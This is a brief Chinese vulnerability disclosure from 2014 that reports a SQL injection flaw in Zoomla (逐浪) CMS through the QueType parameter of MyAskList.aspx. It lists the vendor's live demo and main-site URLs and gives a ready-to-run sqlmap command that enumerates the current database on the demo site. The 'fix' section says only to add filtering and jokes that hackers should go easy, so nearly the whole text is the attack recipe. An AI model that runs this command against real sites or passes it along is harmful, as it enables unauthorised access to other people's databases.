逐浪cms通用型Sql注入漏洞及漏洞修复方案2014
Url:http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?QueType=
http://www.zoomla.cn/guest/Ask/MyAskList.aspx?QueType=
参数QueType
权限太大啊,妥妥低。
sqlmap.py -u "http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?
QueType=1" -v 1 --current-db
修复方案:
赶快过滤吧,黑客大牛们手下留情,哈哈